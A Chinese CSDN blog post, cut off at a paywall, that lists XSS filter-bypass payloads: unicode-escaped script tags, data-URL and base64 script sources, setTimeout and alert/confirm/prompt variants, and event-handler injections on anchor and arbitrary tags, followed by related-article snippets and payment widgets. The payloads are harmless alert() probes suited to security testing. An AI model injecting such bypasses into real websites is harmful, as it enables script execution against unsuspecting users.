XSS----一些方法

最新推荐文章于 2024-08-16 18:08:04 发布
最新推荐文章于 2024-08-16 18:08:04 发布
阅读量1.2k 收藏 3
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bylfsj/article/details/100747587
版权
本文详细探讨了XSS攻击的各种绕过方法,包括标签的使用如script标签的src属性通过dataurl协议,String.fromCharCode,setTimeout等。还介绍了a标签的事件与href属性利用,表单的button和onsubmit,以及图片、body滚动条、iframe的src等。同时,文章讲解了利用字符编码的技巧,如HTML、URL和JavaScript中的hex, unicode, ascii解析规则,深入解析浏览器如何处理字符实体,避免脚本执行。" 54911669,4997973,深入剖析backbone源码:模块化、事件系统与设计模式,"['backbone', '前端框架', '设计模式', '源码分析']
摘要由CSDN通过智能技术生成

参考https://blog.csdn.net/qq_29277155/article/details/51320064

0x01.标签绕过

1 script篇

方法:

1.1 ascii标识符

<script>\u0061\u006C\u0065\u0072\u0074(88199)</script>

1.2…标签的src属性---------dataurl 协议

 <script src=data:text/javascript,alert(88199)></script>
    
<script src=&#100&#97&#116&#97:text/javascript,alert(88199)></script>

<script src=data:text/html;base64,YWxlcnQoMSk=></script>

base64-----------alert(1)

1.3.String.fromCharCode

1.4.setTimeout

## <script>setTimeout(alert(88199),0)</script>

1.5.普通方式

<script>alert(navigator.userAgent)<script>
<script>alert(88199)</script>
<script>confirm(88199)</script>
<script>prompt(88199)</script>

<script>+alert(88199)</script>
<script>alert(/88199/)</script>

<script>alert(/88199/.source)</script>

0x02、a标签运用

1.事件

<anytag οnmοuseοver=alert(15)>M
<anytag οnclick=alert(16)>M
<a οnmοuseοver=alert(17)>M
<a οnclick=alert(18)>M

2.href属性

最低0.47元/天 解锁文章
bylfsj
关注
专栏目录
xss-labs.zip
03-18
3. 防御XSS:学习如何使用输入验证、输出编码、HTTPOnly Cookie等方法来防止XSS攻击。 4. 模拟攻击:尝试在实验室环境中模拟真实世界中的XSS攻击,理解其危害。 每个子文件可能代表一种特定的XSS场景,通过解决这些...
Xss
ivalue的博客
07-26 1098
XSS(Cross Site Scripting)攻击全称跨站脚本攻击,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。xss就是在页面执行你所要执行的js。 Fuzz testing 模糊测试   point:“xss盲打”,“xss编码绕过”,“fuzzing xss”   参考 https://blog.csdn.net/u...
xss
阳光梦的专栏
06-04 829
打算挖个坑,写点Web安全漏洞的东西,今天先填个XSS的,基础向,大神轻喷。 ====== 随着互联网流行,以及网站互动性的提高,像论坛、微博还有各种web2.0应用的兴起,很多网站都可以由用户或多或少的参与,可能很多的网站用户注册之后都可以评论、发帖等等。 当然这些都是对正常向的用户来说的,如果是一个攻击者当然不会老老实实的发帖子之类的了。 众所周知,现在看到的网页基本都是用ht
XSS-跨站脚本攻击
最新发布
qq_64177395的博客
08-16 1556
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的1.2 XSS类型反射型也称为非持久型,这种类型的脚本是最常见的,也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中。
XSS
V
10-09 1480
XSS漏洞详解XSS漏洞基础讲解XSS漏洞挖掘与绕过XSS漏洞的综合利用 XSS漏洞基础讲解 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSSXSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。 XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。 OWAS...
xss-filter-spring-boot-starter:springboot自动xss
05-17
使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss过滤 @RequestMapping("/test1") public String test1...
xss-lab全通关教程
05-07
这份教程包含了20个不同的挑战关卡,旨在逐步引导学习者掌握XSS的各种类型和防范方法。 首先,我们要理解XSS的三种主要类型:反射型XSS、存储型XSS和DOM型XSS。反射型XSS是通过诱使用户点击含有恶意代码的链接来...
积分管理系统java源码-xss-defense:xss防御
06-06
虽然有大量的XSS攻击方式,但是遵循一些简单的规则可以完全抵御这些严重攻击。本文不探讨XSS对技术、业务的影响,只说XSS可以导致攻击者能够获取到操作浏览器的做任何事情的能力。 都可以通过在服务端执行适当的验证...
X-XSS-Protection
07-28
X-XSS-Protection是一种HTTP响应头,用于防止跨站脚本攻击(XSS)。它在Internet Explorer,Chrome和Safari等浏览器中可用。\[1\]该头部有几种配置选项,包括关闭浏览器的XSS防护(0),删除检测到的恶意代码(1),以及当检测到反射的XSS攻击时阻止加载页面(1; mode=block)。\[2\]在PHP中,可以使用header函数来设置X-XSS-Protection头部。例如,header("X-XSS-Protection: 1; mode=block")。\[2\]尽管现代浏览器通常不需要这些保护,因为可以通过实施强大的内容安全策略(CSP)来禁用内联的JavaScript,但对于不支持CSP的旧版浏览器的用户仍然提供了一定的保护。\[3\] #### 引用[.reference_title] - *1* *2* [防XSS注入方法](https://blog.csdn.net/weixin_45382656/article/details/103765012)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [X-XSS-Protection](https://blog.csdn.net/suo082407128/article/details/104940753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值